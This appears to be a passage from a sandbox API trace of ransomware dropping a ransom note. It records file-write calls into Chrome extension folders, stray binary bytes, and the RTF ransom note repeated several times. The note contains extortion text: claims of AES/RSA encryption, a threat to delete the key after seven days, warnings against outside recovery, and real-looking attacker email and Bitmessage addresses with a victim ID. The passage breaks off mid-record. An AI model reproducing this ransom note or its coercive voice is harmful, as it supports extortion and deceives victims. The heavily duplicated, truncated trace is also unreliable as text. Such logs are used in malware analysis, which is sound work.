FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nxà­Å(\x177\x16\x8fØQ¨nL\x0bÍQ\x07FôÁÓDÓÎ\x01", lpUsedDefaultChar=0x0) returned 8717 [0280.285] WriteFile (in: hFile=0x2c8, lpBuffer=0x2358878*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2358878*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0280.285] CloseHandle (hObject=0x2c8) returned 1 [0280.285] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\#readme_eman#.rtf")) returned 0xffffffff [0280.286] GetLastError () returned 0x2 [0280.286] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0280.286] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0280.286] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0280.286] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 